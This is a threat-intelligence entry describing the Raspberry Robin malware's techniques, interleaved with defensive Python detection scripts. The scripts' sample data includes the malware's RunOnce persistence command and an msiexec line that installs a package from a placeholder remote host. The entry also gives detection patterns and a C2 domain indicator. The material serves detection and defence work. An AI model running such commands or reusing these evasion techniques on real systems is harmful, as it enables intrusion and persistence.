Raspberry Robin

Raspberry Robin is initial access malware first identified in September 2021 and active through early 2024. It is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remotely hosted payloads for installation. Raspberry Robin has been used widely across industries and geographies, and as a precursor to information stealers, ransomware, and other payloads such as SocGholish, Cobalt Strike, IcedID, and Bumblebee.[1][2][3] The DLL component in the Raspberry Robin infection chain is also referred to as "Roshtyak."[4] The name "Raspberry Robin" refers both to the malware and to the threat actor associated with its use; some vendors track the operators as Storm-0856.[5]

ID: S1130
Type: MALWARE
Platforms: Windows
Contributors: Swachchhanda Shrawan Poudel
Version: 1.0
Created: 17 May 2024
Last Modified: 23 July 2024

Techniques Used

Domain ID Name Use
Enterprise T1548 Abuse Elevation Control Mechanism

Raspberry Robin implements a variation of the ucmDccwCOMMethod technique abusing the Windows AutoElevate backdoor to bypass UAC while elevating privileges.[1]

.002 Bypass User Account Control

Raspberry Robin will use the legitimate Windows utility fodhelper.exe to run processes at elevated privileges without requiring a User Account Control prompt.[2]

Enterprise T1583 .001 Acquire Infrastructure: Domains

Raspberry Robin uses newly registered domains containing only a few characters for command and control purposes, such as "v0[.]cx".[2]

.008 Acquire Infrastructure: Malvertising

Raspberry Robin variants have been delivered via malicious advertising items that, when interacted with, download a malicious archive file containing the initial payload, hosted on services such as Discord.[3]

Enterprise T1071 Application Layer Protocol

Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads.[2][1][3]

.001 Web Protocols

Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.[2] Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.[3]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Raspberry Robin uses a Registry RunOnce value to persist across reboot, for example: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\{random value name} = "rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s "{dropped copy path and file name}"".[1]

Enterprise T1059 Command and Scripting Interpreter

Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files (WSF) for initial execution.[3]

.003 Windows Command Shell

Raspberry Robin uses cmd.exe to read and execute a file stored on an infected USB device as part of initial installation.[2]

Enterprise T1622 Debugger Evasion

Raspberry Robin leverages anti-debugging mechanisms through the use of ThreadHideFromDebugger.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information

Raspberry Robin contains several layers of obfuscation to hide malicious code from detection and analysis.[1]

Enterprise T1480 Execution Guardrails

Raspberry Robin will check for the presence of several security products on victim machines and will avoid UAC bypass mechanisms if they are identified.[1] Raspberry Robin can use specific cookie values in HTTP requests to command and control infrastructure to validate that requests for second stage payloads originate from the initial downloader script.[3]

Enterprise T1083 File and Directory Discovery

Raspberry Robin will check to see if the initial executing script is located on the user's Desktop as an anti-analysis check.[3]

Enterprise T1574 Hijack Execution Flow

Raspberry Robin will drop a copy of itself to a subfolder in %ProgramData% or %ProgramData%\Microsoft\ to attempt privilege elevation and defense evasion if not running in Session 0.[1]

.002 DLL Side-Loading

Raspberry Robin can use legitimate, signed EXE files paired with malicious DLL files to load and run malicious payloads while bypassing defenses.[3]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Raspberry Robin can add an exception to Microsoft Defender that excludes the entire main drive from anti-malware scanning to evade detection.[3]
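A drive-wide Defender exclusion is easy to spot once exclusion paths are normalised, because "C:\", "C:\*" and "%SystemDrive%\*" all mean the same thing. The following is an added example written for this page (it is not Raspberry Robin code and not part of the ATT&CK entry). It assumes the exclusion paths have already been collected, for example from (Get-MpPreference).ExclusionPath or as value names under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths; the sample list is constructed.

```python
r"""Flag Microsoft Defender path exclusions that cover an entire drive.

Added example (not Raspberry Robin code and not from the ATT&CK entry). The
input is a list of exclusion paths as Defender reports them, e.g. from
(Get-MpPreference).ExclusionPath; SAMPLE_EXCLUSIONS is constructed."""
import re

# After normalisation a whole-drive exclusion is a bare drive letter, the
# %SystemDrive% variable, or the extended-length form \\?\C:.
DRIVE_ROOT = re.compile(r"^(?:[a-z]:|%systemdrive%|\\\\\?\\[a-z]:)$", re.IGNORECASE)

SAMPLE_EXCLUSIONS = [  # constructed sample input
    "C:\\",                            # entire system drive
    r"C:\Program Files\Vendor\Agent",  # narrow, plausibly legitimate
    r"%SystemDrive%\*",                # whole drive via environment variable plus wildcard
    "\\\\?\\D:\\",                     # whole drive via the \\?\ extended-length prefix
    r"D:\Backups",
]


def normalise(path: str) -> str:
    r"""Strip surrounding quotes, trailing separators and a trailing wildcard so
    that C:\, C:\* and "C:" all compare equal."""
    p = path.strip().strip('"')
    while p.endswith(("\\", "/", "*")):
        p = p[:-1]
    return p


def drive_wide_exclusions(paths):
    """Return the exclusions (in their original form) that cover a whole drive."""
    return [p for p in paths if DRIVE_ROOT.match(normalise(p))]


if __name__ == "__main__":
    for p in drive_wide_exclusions(SAMPLE_EXCLUSIONS):
        print("drive-wide Defender exclusion:", p)
```

Narrow exclusions are left for a human to review; the point of the rule is that nothing legitimate needs the whole system drive excluded, so a hit is worth an alert on its own rather than a score contribution.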

Enterprise T1070 .004 Indicator Removal: File Deletion

Raspberry Robin can delete its initial delivery script from disk during execution.[3]

.009 Indicator Removal: Clear Persistence

Raspberry Robin uses a RunOnce Registry key for persistence, where the key is removed after its use on reboot then re-added by the malware after it resumes execution.[5]
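The RunOnce value quoted under T1547.001 and the delete-then-re-add behaviour described just above can both be checked from two snapshots of a user's Run and RunOnce keys. What follows is an added example written for this page, not Raspberry Robin code and not part of the ATT&CK entry. The snapshots, the value names and the %ProgramData% subfolder are constructed; the only real detail carried over is the rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s command shape from the page.

```python
"""Inspect Run/RunOnce values for the rundll32 -> shell32!ShellExec_RunDLL ->
regsvr32 /u /s chain (T1547.001 above) and for a RunOnce value that Windows
consumed at logon but that came back under a new random name (T1070.009 above).

Added example (not Raspberry Robin code and not from the ATT&CK entry).
Snapshots are constructed; value names and the dropped path are invented."""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
RUNONCE_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"

# rundll32 hosting shell32's ShellExec_RunDLL(A/W) to launch regsvr32 with /u /s:
# /u calls the DLL's DllUnregisterServer export, which a malicious DLL simply
# implements as its entry point, and /s suppresses message boxes. rundll32
# accepts either a comma or a space between the DLL name and the export.
SHELLEXEC_REGSVR = re.compile(
    r"rundll32(?:\.exe)?\s+shell32(?:\.dll)?\s*,?\s*ShellExec_RunDLL[AW]?\s+regsvr(?:32)?\b.*?/u\b.*?/s\b",
    re.IGNORECASE,
)

# Constructed value data in the shape quoted on the page; the path is invented.
PAYLOAD = r'rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s "C:\ProgramData\Wjkpz\qlhtvmx.dll"'

SNAPSHOT_BEFORE = [  # constructed: values captured before the user logged off
    {"key": RUNONCE_KEY, "name": "ffxmqb", "data": PAYLOAD},
    {"key": RUNONCE_KEY, "name": "VendorCleanup", "data": r'"C:\Program Files\Vendor\cleanup.exe" /quiet'},
    {"key": RUN_KEY, "name": "OneDrive", "data": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]
SNAPSHOT_AFTER = [  # constructed: captured after logon; both RunOnce values ran, one came back
    {"key": RUNONCE_KEY, "name": "zqpvr", "data": PAYLOAD},
    {"key": RUN_KEY, "name": "OneDrive", "data": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]


def flag_shellexec_regsvr(values):
    """Return autostart values whose data matches the rundll32/ShellExec_RunDLL/regsvr chain."""
    return [v for v in values if SHELLEXEC_REGSVR.search(v["data"])]


def recreated_runonce(before, after):
    """Windows deletes a RunOnce value before running it, so identical RunOnce
    data present in both snapshots means whatever it launched wrote it back.
    Match on data rather than name, because the value name is random each time."""
    earlier = {v["data"]: v["name"] for v in before if v["key"] == RUNONCE_KEY}
    return [
        {"old_name": earlier[v["data"]], "new_name": v["name"], "data": v["data"]}
        for v in after
        if v["key"] == RUNONCE_KEY and v["data"] in earlier
    ]


if __name__ == "__main__":
    for v in flag_shellexec_regsvr(SNAPSHOT_BEFORE + SNAPSHOT_AFTER):
        print("suspicious autostart:", v["key"], v["name"], v["data"])
    for hit in recreated_runonce(SNAPSHOT_BEFORE, SNAPSHOT_AFTER):
        print("RunOnce re-created:", hit["old_name"], "->", hit["new_name"])
```

The benign VendorCleanup entry is consumed and never returns, so only the re-created value is reported; in practice the two snapshots would come from periodic autoruns-style collection rather than a single logoff/logon pair.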

Enterprise T1105 Ingress Tool Transfer

Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's %AppData% folder.[3][2]

Enterprise T1559 Inter-Process Communication

Raspberry Robin contains an embedded custom Tor network client that communicates with the primary payload via shared process memory.[1]

.001 Component Object Model

Raspberry Robin creates an elevated COM object for CMLuaUtil and uses this to set a registry value that points to the malicious LNK file during execution.[1]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

Raspberry Robin will execute its payload prior to initializing command and control traffic by impersonating one of several legitimate program names such as dllhost.exe, regsvr32.exe, or rundll32.exe.[1]

.008 Masquerading: Masquerade File Type

Raspberry Robin has historically been delivered via infected USB drives containing a malicious LNK object masquerading as a legitimate folder.[2]

Enterprise T1571 Non-Standard Port

Raspberry Robin will communicate via HTTP over port 8080 for command and control traffic.[2]

Enterprise T1027 Obfuscated Files or Information

Raspberry Robin uses mixed-case letters for filenames and commands to evade detection.[2]

.002 Software Packing

Raspberry Robin contains multiple payloads that are packed for defense evasion purposes and unpacked on runtime.[1]

Enterprise T1057 Process Discovery

Raspberry Robin can identify processes running on the victim machine, such as security software, during execution.[1][3]

Enterprise T1055 .012 Process Injection: Process Hollowing

Raspberry Robin will execute a legitimate process, then suspend it to inject code for a Tor client into the process, followed by resumption of the process to enable Tor client execution.[1]

Enterprise T1091 Replication Through Removable Media

Raspberry Robin has historically used infected USB media to spread to new victims.[1][2]

Enterprise T1518 .001 Software Discovery: Security Software Discovery

Raspberry Robin attempts to identify security software running on the victim machine, such as BitDefender, Avast, and Kaspersky.[1][3]

Enterprise T1218 .007 System Binary Proxy Execution: Msiexec

Raspberry Robin uses msiexec.exe for post-installation communication to command and control infrastructure.[2] Msiexec.exe is executed referencing a remote resource for second-stage payload retrieval and execution.[1]

.008 System Binary Proxy Execution: Odbcconf

Raspberry Robin uses the Windows utility odbcconf.exe to execute malicious commands, using the regsvr flag to execute DLLs and bypass application control mechanisms that are not monitoring for odbcconf.exe abuse.[2]

.010 System Binary Proxy Execution: Regsvr32

Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.[2]

.011 System Binary Proxy Execution: Rundll32

Raspberry Robin uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with Tor nodes.[2]
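The four System Binary Proxy Execution entries above share one observable: msiexec.exe, odbcconf.exe, regsvr32.exe and rundll32.exe are launched either with no command line at all and then talk to the network, or (for msiexec) with a remote package URL. The block below is an added detection example written for this page; it is not Raspberry Robin code and not part of the ATT&CK entry. It assumes process-creation and network-connection telemetry in the shape of Sysmon Event ID 1 and Event ID 3 exported as JSON lines (the field names ProcessId, Image, CommandLine, DestinationIp and DestinationPort are assumed to survive export unchanged), and the sample events are constructed with addresses from the TEST-NET documentation ranges.

```python
"""Correlate proxy-execution binaries started with an empty command line with
their later outbound connections (T1218.007/.008/.010/.011 above).

Added example (not Raspberry Robin code and not from the ATT&CK entry). The
events are constructed to resemble Sysmon Event ID 1 (process create) and
Event ID 3 (network connect) as JSON lines; field names are assumed."""
import json
import ntpath
from typing import Iterable

# Proxy-execution binaries named on this page, mapped to their sub-technique.
TECHNIQUE = {
    "msiexec.exe": "T1218.007",
    "odbcconf.exe": "T1218.008",
    "regsvr32.exe": "T1218.010",
    "rundll32.exe": "T1218.011",
}

SAMPLE_EVENTS = [  # constructed telemetry
    r'{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe"}',
    r'{"EventID": 3, "ProcessId": 4120, "DestinationIp": "203.0.113.10", "DestinationPort": 8080}',
    r'{"EventID": 1, "ProcessId": 5200, "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"}',
    r'{"EventID": 3, "ProcessId": 5200, "DestinationIp": "198.51.100.20", "DestinationPort": 443}',
    r'{"EventID": 1, "ProcessId": 6011, "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "\"C:\\Windows\\System32\\rundll32.exe\""}',
    r'{"EventID": 3, "ProcessId": 6011, "DestinationIp": "198.51.100.7", "DestinationPort": 9001}',
    r'{"EventID": 1, "ProcessId": 7300, "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec /q /i http://example.invalid/payload.msi"}',
]


def arguments_of(command_line: str) -> str:
    """Return whatever follows the executable token of a Windows command line,
    handling a quoted executable path such as "C:\\Windows\\System32\\rundll32.exe"."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.partition(" ")[2]
    return rest.strip()


def detect(events: Iterable[str]) -> list[dict]:
    """Flag (a) a proxy binary launched with no arguments that later connects out,
    keyed by PID, and (b) msiexec launched against an http(s) package. PID reuse
    between the two events is ignored here; a real pipeline keys on ProcessGuid."""
    argless: dict[int, str] = {}
    findings: list[dict] = []
    for line in events:
        ev = json.loads(line)
        pid = ev["ProcessId"]
        if ev["EventID"] == 1:
            image = ntpath.basename(ev["Image"]).lower()
            if image not in TECHNIQUE:
                continue
            args = arguments_of(ev["CommandLine"])
            if not args:
                argless[pid] = image
            elif image == "msiexec.exe" and ("http://" in args.lower() or "https://" in args.lower()):
                findings.append({"pid": pid, "image": image, "technique": TECHNIQUE[image],
                                 "reason": f"msiexec launched against a remote package: {args}"})
        elif ev["EventID"] == 3 and pid in argless:
            image = argless.pop(pid)  # report the first connection only
            findings.append({"pid": pid, "image": image, "technique": TECHNIQUE[image],
                             "reason": f"{image} started with no arguments, then connected to "
                                       f"{ev['DestinationIp']}:{ev['DestinationPort']}"})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["technique"], f["pid"], f["reason"])
```

The rundll32 launch with shell32.dll,Control_RunDLL is deliberately left unflagged: it has arguments, and a rule that fires on every rundll32 network connection would drown in Control Panel and shell noise. Destination port is carried through rather than matched, so the 8080 and Tor-like 9001 cases are visible to an analyst without hard-coding them.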

Enterprise T1082 System Information Discovery

Raspberry Robin performs several system checks as part of anti-analysis mechanisms, including querying the operating system build number, processor vendor and type, video controller, and CPU temperature.[3]

Enterprise T1033 System Owner/User Discovery

Raspberry Robin determines whether it is successfully running on a victim system by querying the running account information to check whether it is in Session 0, which indicates it is running with elevated privileges.[1]

Enterprise T1204 User Execution

Raspberry Robin execution can rely on users directly interacting with malicious LNK files.[5]

Enterprise T1497 Virtualization/Sandbox Evasion

Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment.[1]

.001 System Checks

Raspberry Robin performs a variety of system environment checks to determine if it is running in a virtualized or sandboxed environment, such as querying CPU temperature information and network card MAC address information.[3]

Enterprise T1102 Web Service

Raspberry Robin second stage payloads can be hosted as RAR files, containing a malicious EXE and DLL, on Discord servers.[3]

Enterprise T1047 Windows Management Instrumentation

Raspberry Robin can execute via LNK containing a command to run a legitimate executable, such as wmic.exe, to download a malicious Windows Installer (MSI) package.[1]

References